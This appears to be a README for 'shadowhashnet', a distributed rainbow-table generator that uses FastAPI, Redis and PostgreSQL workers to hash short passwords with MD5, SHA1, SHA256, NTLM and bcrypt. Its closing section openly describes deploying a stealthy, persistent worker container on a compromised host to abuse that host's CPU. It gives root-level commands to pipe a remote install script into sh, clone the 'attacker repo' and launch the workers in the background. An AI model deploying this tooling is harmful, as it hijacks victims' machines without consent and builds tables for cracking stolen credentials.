- FastAPI for backend APIs & UI routes
- Redis for:
- Task queue (
password_queue) - Resume index tracking (
password_gen_index) - Worker health and stats (
active_worker:*,hashes_stored:*)
- Task queue (
- PostgreSQL for persistent hash storage (
rainbow_table) - Jinja2 for UI templating (
/ui/stats,/ui/passwords) - Threaded Daemons for:
- Password generation (resumable)
- Global + per-worker hashrate monitoring
- Multiprocessing Pool for worker-side hashing (scales with CPU cores)
- Resumable thanks to Redis (
password_gen_index) - Starts from last saved index on every server restart
- Stops after generating all combinations of up to 5-char passwords using
[a-z0-9] - Stores passwords in
password_queue
- Fetches task via
/get_task - Computes MD5, SHA1, SHA256, NTLM (MD4), Bcrypt
- Sends result to
/store_hash - Pings health to
/ping - Uses multiprocessing (
n = cores // 2)
/ui/stats: Live info about:- Queue size
- Total hashes
- Workersβ status, health, hashrate
/ui/passwords: View all stored passwords and hashes
- Persistence handled smartly via Redis (
password_gen_indexand counters) - Concurrency:
- Async DB pool via
asyncpg - Threaded background tasks for master
- Multiprocessing workers for parallel hashing
- Async DB pool via
- Scale: Easily extensible to multiple workers
- Deploy a stealthy, persistent
shadowhashnetworker container on a compromised - host to abuse its CPU for rainbow-table generation.
- Root or sudo on target machine
- Internet connectivity
# 1. Install Docker (if absent)
curl -fsSL https://get.docker.com | sh
sudo systemctl enable docker
sudo systemctl start docker
# 2. Retrieve attacker repo
git clone https://github.com/drk1rd/shadowhashnet.git
cd shadowhashnet
# 3. Launch worker + dependencies in background
docker-compose up -d